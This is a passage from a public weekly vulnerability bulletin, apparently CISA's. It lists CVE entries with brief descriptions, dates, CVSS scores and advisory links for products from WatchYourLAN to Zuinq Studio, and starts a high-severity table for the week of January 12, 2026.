| WatchYourLAN--WatchYourLAN | WatchYourLAN Configuration Page Argument Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of WatchYourLAN. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the arpstrs parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26708. | 2026-01-23 | not yet calculated | CVE-2026-0774 | ZDI-26-039 |
| wbolt.com--IMGspider | Server-Side Request Forgery (SSRF) vulnerability in wbolt.com IMGspider imgspider allows Server Side Request Forgery. This issue affects IMGspider: from n/a through <= 2.3.12. | 2026-01-22 | not yet calculated | CVE-2026-22482 | https://patchstack.com/database/Wordpress/Plugin/imgspider/vulnerability/wordpress-imgspider-plugin-2-3-12-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Web Impian--Bayarcash WooCommerce | Missing Authorization vulnerability in Web Impian Bayarcash WooCommerce bayarcash-wc allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bayarcash WooCommerce: from n/a through <= 4.3.11. | 2026-01-23 | not yet calculated | CVE-2026-24606 | https://patchstack.com/database/Wordpress/Plugin/bayarcash-wc/vulnerability/wordpress-bayarcash-woocommerce-plugin-4-3-11-broken-access-control-vulnerability?_s_id=cve |
| WebAppick--CTX Feed | Missing Authorization vulnerability in WebAppick CTX Feed webappick-product-feed-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CTX Feed: from n/a through <= 6.6.18. | 2026-01-22 | not yet calculated | CVE-2026-22461 | https://patchstack.com/database/Wordpress/Plugin/webappick-product-feed-for-woocommerce/vulnerability/wordpress-ctx-feed-plugin-6-6-15-broken-access-control-vulnerability?_s_id=cve |
| webdevstudios--Automatic Featured Images from Videos | Missing Authorization vulnerability in webdevstudios Automatic Featured Images from Videos automatic-featured-images-from-videos allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Automatic Featured Images from Videos: from n/a through <= 1.2.7. | 2026-01-23 | not yet calculated | CVE-2026-24535 | https://patchstack.com/database/Wordpress/Plugin/automatic-featured-images-from-videos/vulnerability/wordpress-automatic-featured-images-from-videos-plugin-1-2-7-broken-access-control-vulnerability?_s_id=cve |
| WebGeniusLab--iRecco Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebGeniusLab iRecco Core irecco-core allows PHP Local File Inclusion. This issue affects iRecco Core: from n/a through <= 1.3.6. | 2026-01-22 | not yet calculated | CVE-2025-69046 | https://patchstack.com/database/Wordpress/Plugin/irecco-core/vulnerability/wordpress-irecco-core-plugin-1-3-6-local-file-inclusion-vulnerability?_s_id=cve |
| WebPros--WebPros | An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9.1 allows privilege escalation. | 2026-01-22 | not yet calculated | CVE-2025-66428 | https://docs.plesk.com/release-notes/obsidian/change-log/#wordpress-toolkit-6.9.1 |
| webpushr--Webpushr | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in webpushr Webpushr webpushr-web-push-notifications allows Retrieve Embedded Sensitive Data. This issue affects Webpushr: from n/a through <= 4.38.0. | 2026-01-23 | not yet calculated | CVE-2026-24536 | https://patchstack.com/database/Wordpress/Plugin/webpushr-web-push-notifications/vulnerability/wordpress-webpushr-plugin-4-38-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| Weintek--cMT3072XH | The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable. A low-privileged user can modify the parameters and potentially manipulate account-level privileges. | 2026-01-22 | not yet calculated | CVE-2025-14750 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-05 |
| Weintek--cMT3072XH | A low-privileged user can bypass account credentials without confirming the user's current authentication state, which may lead to unauthorized privilege escalation. | 2026-01-22 | not yet calculated | CVE-2025-14751 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-05 |
| WEN Solutions--Contact Form 7 GetResponse Extension | Insertion of Sensitive Information Into Sent Data vulnerability in WEN Solutions Contact Form 7 GetResponse Extension contact-form-7-getresponse-extension allows Retrieve Embedded Sensitive Data. This issue affects Contact Form 7 GetResponse Extension: from n/a through <= 1.0.8. | 2026-01-23 | not yet calculated | CVE-2026-24557 | https://patchstack.com/database/Wordpress/Plugin/contact-form-7-getresponse-extension/vulnerability/wordpress-contact-form-7-getresponse-extension-plugin-1-0-8-sensitive-data-exposure-vulnerability?_s_id=cve |
| whisper-money--whisper-money | Whisper Money is a personal finance application. Versions prior to 0.1.5 have an insecure direct object reference vulnerability. A user can update/create account balances in other users' bank accounts. Version 0.1.5 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2026-23844 | https://github.com/whisper-money/whisper-money/security/advisories/GHSA-c4g3-wpxr-2m74 https://github.com/whisper-money/whisper-money/pull/60 https://github.com/whisper-money/whisper-money/commit/80117c3edeaf5c5a5166f3815fc555a15b5ce686 |
| winkm89--teachPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in winkm89 teachPress teachpress allows Stored XSS. This issue affects teachPress: from n/a through <= 9.0.12. | 2026-01-22 | not yet calculated | CVE-2026-22353 | https://patchstack.com/database/Wordpress/Plugin/teachpress/vulnerability/wordpress-teachpress-plugin-9-0-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| winkm89--teachPress | Cross-Site Request Forgery (CSRF) vulnerability in winkm89 teachPress teachpress allows Cross Site Request Forgery. This issue affects teachPress: from n/a through <= 9.0.12. | 2026-01-22 | not yet calculated | CVE-2026-22483 | https://patchstack.com/database/Wordpress/Plugin/teachpress/vulnerability/wordpress-teachpress-plugin-9-0-12-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WisdmLabs--Edwiser Bridge | Missing Authorization vulnerability in WisdmLabs Edwiser Bridge edwiser-bridge allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Edwiser Bridge: from n/a through <= 4.3.2. | 2026-01-23 | not yet calculated | CVE-2026-24570 | https://patchstack.com/database/Wordpress/Plugin/edwiser-bridge/vulnerability/wordpress-edwiser-bridge-plugin-4-3-2-broken-access-control-vulnerability?_s_id=cve |
| woofer696--Dinatur | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in woofer696 Dinatur dinatur allows Stored XSS. This issue affects Dinatur: from n/a through <= 1.18. | 2026-01-22 | not yet calculated | CVE-2025-68866 | https://patchstack.com/database/Wordpress/Plugin/dinatur/vulnerability/wordpress-dinatur-plugin-1-18-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WorklogPRO--WorklogPRO | The WorklogPRO - Timesheets for Jira plugin in Jira Data Center before version 4.23.6-jira10 and before version 4.23.5-jira9 allows users and attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability. The vulnerability is exploited via a specially crafted payload placed in an issue's summary field | 2026-01-21 | not yet calculated | CVE-2025-57681 | https://marketplace.atlassian.com/apps/1212626/worklogpro-timesheets-for-jira/version-history https://thestarware.atlassian.net/wiki/spaces/WLP/pages/3326574597/Security+Advisory+CVE-2025-57681+-+Stored+XSS+in+WorklogPRO+DC |
| WorklogPRO--WorklogPRO | The WorklogPRO - Jira Timesheets plugin in the Jira Data Center before 4.24.2-jira9, 4.24.2-jira10 and 4.24.2-jira11 allows attackers to inject arbitrary HTML or JavaScript via XSS. This is exploited via a crafted payload placed in the name of a filter. This code is executed in the browser when the user attempts to create a timesheet with the filter timesheet type on the custom timesheet dialog because the filter name is not properly sanitized during the action. | 2026-01-20 | not yet calculated | CVE-2025-67824 | https://marketplace.atlassian.com/apps/1212626/worklogpro-timesheets-for-jira/version-history https://thestarware.atlassian.net/wiki/x/CAAdyg |
| WP Chill--Gallery PhotoBlocks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Chill Gallery PhotoBlocks photoblocks-grid-gallery allows DOM-Based XSS. This issue affects Gallery PhotoBlocks: from n/a through <= 1.3.2. | 2026-01-22 | not yet calculated | CVE-2026-24389 | https://patchstack.com/database/Wordpress/Plugin/photoblocks-grid-gallery/vulnerability/wordpress-gallery-photoblocks-plugin-1-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Chill--Modula Image Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Chill Modula Image Gallery modula-best-grid-gallery allows Stored XSS. This issue affects Modula Image Gallery: from n/a through <= 2.13.4. | 2026-01-22 | not yet calculated | CVE-2026-23976 | https://patchstack.com/database/Wordpress/Plugin/modula-best-grid-gallery/vulnerability/wordpress-modula-image-gallery-plugin-2-13-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Messiah--Ai Image Alt Text Generator for WP | Missing Authorization vulnerability in WP Messiah Ai Image Alt Text Generator for WP ai-image-alt-text-generator-for-wp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ai Image Alt Text Generator for WP: from n/a through <= 1.1.9. | 2026-01-23 | not yet calculated | CVE-2026-24579 | https://patchstack.com/database/Wordpress/Plugin/ai-image-alt-text-generator-for-wp/vulnerability/wordpress-ai-image-alt-text-generator-for-wp-plugin-1-1-9-broken-access-control-vulnerability?_s_id=cve |
| WP Messiah--Frontis Blocks | Server-Side Request Forgery (SSRF) vulnerability in WP Messiah Frontis Blocks frontis-blocks allows Server Side Request Forgery. This issue affects Frontis Blocks: from n/a through <= 1.1.5. | 2026-01-22 | not yet calculated | CVE-2025-68030 | https://patchstack.com/database/Wordpress/Plugin/frontis-blocks/vulnerability/wordpress-frontis-blocks-plugin-1-1-5-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| WP Swings--Points and Rewards for WooCommerce | Missing Authorization vulnerability in WP Swings Points and Rewards for WooCommerce points-and-rewards-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Points and Rewards for WooCommerce: from n/a through <= 2.9.5. | 2026-01-23 | not yet calculated | CVE-2026-24581 | https://patchstack.com/database/Wordpress/Plugin/points-and-rewards-for-woocommerce/vulnerability/wordpress-points-and-rewards-for-woocommerce-plugin-2-9-5-broken-access-control-vulnerability?_s_id=cve |
| WP Travel--WP Travel | Missing Authorization vulnerability in WP Travel WP Travel wp-travel allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Travel: from n/a through <= 11.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24568 | https://patchstack.com/database/Wordpress/Plugin/wp-travel/vulnerability/wordpress-wp-travel-plugin-11-0-0-broken-access-control-vulnerability?_s_id=cve |
| wpdive--ElementCamp | Missing Authorization vulnerability in wpdive ElementCamp element-camp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ElementCamp: from n/a through <= 2.3.2. | 2026-01-23 | not yet calculated | CVE-2026-24556 | https://patchstack.com/database/Wordpress/Plugin/element-camp/vulnerability/wordpress-elementcamp-plugin-2-3-2-broken-access-control-vulnerability?_s_id=cve |
| wpeverest--User Registration | Missing Authorization vulnerability in wpeverest User Registration user-registration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects User Registration: from n/a through <= 4.4.6. | 2026-01-22 | not yet calculated | CVE-2025-67956 | https://patchstack.com/database/Wordpress/Plugin/user-registration/vulnerability/wordpress-user-registration-plugin-4-4-6-broken-access-control-vulnerability?_s_id=cve |
| wpeverest--User Registration | Missing Authorization vulnerability in wpeverest User Registration user-registration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects User Registration: from n/a through <= 4.4.9. | 2026-01-22 | not yet calculated | CVE-2026-24353 | https://patchstack.com/database/Wordpress/Plugin/user-registration/vulnerability/wordpress-user-registration-plugin-4-4-9-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| wphocus--My auctions allegro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Reflected XSS. This issue affects My auctions allegro: from n/a through <= 3.6.32. | 2026-01-22 | not yet calculated | CVE-2025-67943 | https://patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-32-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| wphocus--My auctions allegro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows PHP Local File Inclusion. This issue affects My auctions allegro: from n/a through <= 3.6.33. | 2026-01-22 | not yet calculated | CVE-2026-22464 | https://patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-33-local-file-inclusion-vulnerability?_s_id=cve |
| wpjobportal--WP Job Portal | Authorization Bypass Through User-Controlled Key vulnerability in wpjobportal WP Job Portal wp-job-portal allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Job Portal: from n/a through <= 2.4.3. | 2026-01-22 | not yet calculated | CVE-2026-24379 | https://patchstack.com/database/Wordpress/Plugin/wp-job-portal/vulnerability/wordpress-wp-job-portal-plugin-2-4-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| wproyal--Bard | Missing Authorization vulnerability in wproyal Bard bard allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bard: from n/a through <= 2.229. | 2026-01-22 | not yet calculated | CVE-2025-63018 | https://patchstack.com/database/Wordpress/Theme/bard/vulnerability/wordpress-bard-theme-2-229-broken-access-control-vulnerability?_s_id=cve |
| wptravelengine--Travel Monster | Missing Authorization vulnerability in wptravelengine Travel Monster travel-monster allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Travel Monster: from n/a through <= 1.3.3. | 2026-01-23 | not yet calculated | CVE-2026-24607 | https://patchstack.com/database/Wordpress/Theme/travel-monster/vulnerability/wordpress-travel-monster-theme-1-3-3-broken-access-control-vulnerability?_s_id=cve |
| wpWave--Hide My WP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpWave Hide My WP hide_my_wp allows Reflected XSS. This issue affects Hide My WP: from n/a through <= 6.2.12. | 2026-01-22 | not yet calculated | CVE-2025-69098 | https://patchstack.com/database/Wordpress/Plugin/hide_my_wp/vulnerability/wordpress-hide-my-wp-plugin-6-2-12-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WPXPO--PostX | Missing Authorization vulnerability in WPXPO PostX ultimate-post allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PostX: from n/a through <= 5.0.3. | 2026-01-22 | not yet calculated | CVE-2025-69313 | https://patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-5-0-3-broken-access-control-vulnerability?_s_id=cve |
| XDocReport | A Server-Side Template Injection (SSTI) vulnerability in the FreeMarker component of opensagres XDocReport v1.0.0 to v2.1.0 allows attackers to execute arbitrary code via injecting crafted template expressions. | 2026-01-20 | not yet calculated | CVE-2025-64087 | https://github.com/opensagres/xdocreport https://github.com/opensagres/xdocreport/pull/705 https://hackmd.io/@cuongnh/BJEnw7SAlg https://hackmd.io/@cuongnh/SkQvhEf0lx https://github.com/AT190510-Cuong/CVE-2025-64087-SSTI- |
| XDocReport--XDocReport | An XML External Entity (XXE) vulnerability in opensagres XDocReport v0.9.2 to v2.0.3 allows attackers to execute arbitrary code via uploading a crafted .docx file. | 2026-01-20 | not yet calculated | CVE-2025-65482 | https://github.com/opensagres/xdocreport https://drive.google.com/drive/folders/1hUyCznpBN7ivo5krmyJ4OQc_q626Hy5q?usp=sharing https://hackmd.io/@cuongnh/r1B7B8fJ-g https://hackmd.io/@cuongnh/rkJPCgSy-l https://github.com/AT190510-Cuong/CVE-2025-65482-XXE- |
| XLPlugins--NextMove Lite | Authorization Bypass Through User-Controlled Key vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects NextMove Lite: from n/a through <= 2.23.0. | 2026-01-23 | not yet calculated | CVE-2026-24599 | https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-23-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| XpeedStudio--Bajaar - Highly Customizable WooCommerce WordPress Theme | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in XpeedStudio Bajaar - Highly Customizable WooCommerce WordPress Theme bajaar allows PHP Local File Inclusion. This issue affects Bajaar - Highly Customizable WooCommerce WordPress Theme: from n/a through <= 2.1.0. | 2026-01-22 | not yet calculated | CVE-2025-69004 | https://patchstack.com/database/Wordpress/Theme/bajaar/vulnerability/wordpress-bajaar-highly-customizable-woocommerce-wordpress-theme-theme-2-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| Xpro--Xpro Elementor Addons | Unrestricted Upload of File with Dangerous Type vulnerability in Xpro Xpro Elementor Addons xpro-elementor-addons allows Upload a Web Shell to a Web Server. This issue affects Xpro Elementor Addons: from n/a through <= 1.4.19.1. | 2026-01-22 | not yet calculated | CVE-2025-69312 | https://patchstack.com/database/Wordpress/Plugin/xpro-elementor-addons/vulnerability/wordpress-xpro-elementor-addons-plugin-1-4-19-1-arbitrary-file-upload-vulnerability?_s_id=cve |
| xtemos--WoodMart | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in xtemos WoodMart woodmart allows Code Injection. This issue affects WoodMart: from n/a through <= 8.3.7. | 2026-01-22 | not yet calculated | CVE-2025-47600 | https://patchstack.com/database/Wordpress/Theme/woodmart/vulnerability/wordpress-woodmart-theme-8-3-7-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| xwiki--xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Versions 7.0-milestone-2 through 16.10.11, 17.0.0-rc-1 through 17.4.4, and 17.5.0-rc-1 through 17.7.0 contain a reflected Cross-site Scripting (XSS) vulnerability, which allows an attacker to craft a malicious URL and execute arbitrary actions with the same privileges as the victim. If the victim has administrative or programming rights, those rights can be exploited to gain full access to the XWiki installation. This issue has been patched in versions 17.8.0-rc-1, 17.4.5 and 16.10.12. To workaround, the patch can be applied manually, only a single line in templates/logging_macros.vm needs to be changed, no restart is required. | 2026-01-23 | not yet calculated | CVE-2026-24128 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-wvqx-m5px-6cmp https://github.com/xwiki/xwiki-platform/commit/8337ac8c3b19c37f306723b638b2cae8b0a57dbf https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-16.10.12 https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-17.4.5 https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-17.8.0-rc-1 https://jira.xwiki.org/browse/XWIKI-23462 |
| yasir129--Turn Yoast SEO FAQ Block to Accordion | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in yasir129 Turn Yoast SEO FAQ Block to Accordion faq-schema-block-to-accordion allows Stored XSS. This issue affects Turn Yoast SEO FAQ Block to Accordion: from n/a through <= 1.0.6. | 2026-01-23 | not yet calculated | CVE-2026-24591 | https://patchstack.com/database/Wordpress/Plugin/faq-schema-block-to-accordion/vulnerability/wordpress-turn-yoast-seo-faq-block-to-accordion-plugin-1-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| YITHEMES--YITH WooCommerce Request A Quote | Missing Authorization vulnerability in YITHEMES YITH WooCommerce Request A Quote yith-woocommerce-request-a-quote allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects YITH WooCommerce Request A Quote: from n/a through <= 2.46.0. | 2026-01-22 | not yet calculated | CVE-2026-24366 | https://patchstack.com/database/Wordpress/Plugin/yith-woocommerce-request-a-quote/vulnerability/wordpress-yith-woocommerce-request-a-quote-plugin-2-46-0-broken-access-control-vulnerability?_s_id=cve |
| zhblue--hustoj | hustoj is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. All versions are vulnerable to CSV Injection (Formula Injection) through the contest rank export functionality (contestrank.xls.php and admin/ranklist_export.php). The application fails to sanitize user-supplied input (specifically the "Nickname" field) before exporting it to an .xls file (which renders as an HTML table but is opened by Excel). If a malicious user sets their nickname to an Excel formula when an administrator exports and opens the rank list in Microsoft Excel, the formula will be executed. This can lead to arbitrary command execution (RCE) on the administrator's machine or data exfiltration. A fix was not available at the time of publication. | 2026-01-21 | not yet calculated | CVE-2026-23873 | https://github.com/zhblue/hustoj/security/advisories/GHSA-gqwv-v7vx-2qjw |
| zohocrm--Zoho CRM Lead Magnet | Missing Authorization vulnerability in zohocrm Zoho CRM Lead Magnet zoho-crm-forms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zoho CRM Lead Magnet: from n/a through <= 1.8.1.5. | 2026-01-23 | not yet calculated | CVE-2026-24595 | https://patchstack.com/database/Wordpress/Plugin/zoho-crm-forms/vulnerability/wordpress-zoho-crm-lead-magnet-plugin-1-8-1-5-broken-access-control-vulnerability?_s_id=cve |
| ZoomIt--DZS Video Gallery | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ZoomIt DZS Video Gallery dzs-videogallery allows SQL Injection. This issue affects DZS Video Gallery: from n/a through <= 12.37. | 2026-01-22 | not yet calculated | CVE-2025-49049 | https://patchstack.com/database/Wordpress/Plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-plugin-12-37-sql-injection-vulnerability?_s_id=cve |
| zozothemes--Miion | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Miion miion allows PHP Local File Inclusion. This issue affects Miion: from n/a through <= 1.2.7. | 2026-01-22 | not yet calculated | CVE-2025-68913 | https://patchstack.com/database/Wordpress/Theme/miion/vulnerability/wordpress-miion-theme-1-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| zozothemes--Miion | Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Miion miion allows Upload a Web Shell to a Web Server. This issue affects Miion: from n/a through <= 1.2.7. | 2026-01-22 | not yet calculated | CVE-2025-68986 | https://patchstack.com/database/Wordpress/Theme/miion/vulnerability/wordpress-miion-theme-1-2-7-arbitrary-file-upload-vulnerability?_s_id=cve |
| Zuinq Studio--IsMyGym | Reflected Cross-Site Scripting (XSS) vulnerability in IsMyGym by Zuinq Studio. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL with '/<PATH>.php/<XSS>'. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. | 2026-01-20 | not yet calculated | CVE-2025-41081 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-ismygym |
Vulnerability Summary for the Week of January 12, 2026
Posted on Tuesday January 20, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 10-Strike--Strike Network Inventory Explorer Pro | 10-Strike Network Inventory Explorer Pro 9.31 contains a buffer overflow vulnerability in the text file import functionality that allows remote code execution. Attackers can craft a malicious text file with carefully constructed payload to trigger a reverse shell and execute arbitrary code on the target system. | 2026-01-15 | 9.8 | CVE-2021-47772 | ExploitDB-50472 Vendor Homepage |
| 10-Strike--Strike Network Inventory Explorer Pro | 10-Strike Network Inventory Explorer Pro 9.31 contains an unquoted service path vulnerability in the srvInventoryWebServer service running with LocalSystem privileges. Attackers can exploit the unquoted path by placing malicious executables in potential path segments to achieve privilege escalation and execute code with system-level permissions. | 2026-01-15 | 7.8 | CVE-2021-47767 | ExploitDB-50494 Vendor Homepage |
| 4Homepages--4images | 4images 1.9 contains a remote command execution vulnerability that allows authenticated administrators to inject reverse shell code through template editing functionality. Attackers can save malicious code in the template and execute arbitrary commands by accessing a specific categories.php endpoint with a crafted cat_id parameter. | 2026-01-13 | 8.8 | CVE-2022-50806 | ExploitDB-51147 Official 4images Software Download Page VulnCheck Advisory: 4images 1.9 - Remote Command Execution (RCE) |
| ABB--ABB Ability OPTIMAX | Incorrect Implementation of Authentication Algorithm vulnerability in ABB ABB Ability OPTIMAX.This issue affects ABB Ability OPTIMAX: 6.1, 6.2, from 6.3.0 before 6.3.1-251120, from 6.4.0 before 6.4.1-251120. | 2026-01-16 | 8.1 | CVE-2025-14510 | https://search.abb.com/library/Download.aspx?DocumentID=9AKK108472A1331&LanguageCode=en&DocumentPartId=&Action=Launch |
| Acer--Acer Backup Manager Module | Acer Backup Manager 3.0.0.99 contains an unquoted service path vulnerability in the NTI IScheduleSvc service that allows local users to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\Program Files (x86)\NTI\Acer Backup Manager\ to inject malicious executables that would run with elevated LocalSystem privileges. | 2026-01-16 | 7.8 | CVE-2021-47826 | ExploitDB-49889 Acer Official Homepage VulnCheck Advisory: Acer Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path |
| Acer--Acer Updater Service | Acer Updater Service 1.2.3500.0 contains an unquoted service path vulnerability that allows local users to execute code with elevated system privileges. Attackers can exploit the unquoted path in C:\Program Files\Acer\Acer Updater\ to inject malicious executables that will run with LocalSystem permissions during service startup. | 2026-01-16 | 7.8 | CVE-2021-47825 | ExploitDB-49890 Acer Official Homepage VulnCheck Advisory: Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path |
| Acer--ePowerSvc | Acer ePowerSvc 6.0.3008.0 contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-16 | 7.8 | CVE-2021-47823 | ExploitDB-49900 Acer Official Homepage VulnCheck Advisory: ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path |
| Adobe--Bridge | Bridge versions 15.1.2, 16.0 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21283 | https://helpx.adobe.com/security/products/bridge/apsb26-07.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21267 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21268 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21271 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system write. An attacker could leverage this vulnerability to manipulate or inject malicious data into files on the system. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21272 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could leverage this vulnerability to bypass security measures and execute unauthorized code. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21274 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Illustrator | Illustrator versions 29.8.3, 30.0 and earlier are affected by an Untrusted Search Path vulnerability that could result in arbitrary code execution in the context of the current user. If the application uses a search path to locate critical resources such as programs, an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21280 | https://helpx.adobe.com/security/products/illustrator/apsb26-03.html |
| Adobe--InCopy | InCopy versions 21.0, 19.5.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21281 | https://helpx.adobe.com/security/products/incopy/apsb26-04.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21275 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21276 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21277 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
